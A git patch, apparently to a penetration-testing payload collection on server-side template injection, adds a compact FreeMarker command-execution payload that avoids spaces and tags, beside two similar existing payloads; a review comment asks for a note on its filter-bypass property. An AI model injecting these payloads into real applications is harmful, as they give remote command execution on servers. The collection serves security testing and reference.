From 601db0e188dc58d19be1e89a867eee7be9ae3b59 Mon Sep 17 00:00:00 2001 From: Brendan Scarvell Date: Mon, 24 Jun 2019 21:38:56 +1000 Subject: [PATCH] Added freemarker PoC that doesn't require spaces or tags --- Server Side Template Injection/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index f994467..86c4113 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -150,6 +150,7 @@ The template can be `${3*3}` or the legacy `#{3*3}` ```js <#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")} [#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')} +${"freemarker.template.utility.Execute"?new()("id")} ``` ## Jade / Codepen @@ -334,4 +335,4 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 * [RCE in Hubspot with EL injection in HubL - @fyoorer](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?spref=tw) * [Jinja2 template injection filter bypasses - @gehaxelt, @0daywork](https://0day.work/jinja2-template-injection-filter-bypasses/) * [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9) -* [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf) \ No newline at end of file +* [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf)
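Review bot: The added line `${"freemarker.template.utility.Execute"?new()("id")}` in the first hunk (README.md, around line 150) goes into the existing code block with nothing in the README saying what distinguishes it from the two lines above it. The property that matters, that it needs no spaces and no `<#assign>` / `[#assign]` tag, is stated only in the commit subject. Suggest adding one sentence above the fence, or moving the line into its own labelled block, saying that this form is a single interpolation with no directive and no whitespace, so a reader assessing an input filter can see that stripping tags or spaces does not cover it. Minor style point on the same block: the fence is tagged `js` although the content is FreeMarker template syntax.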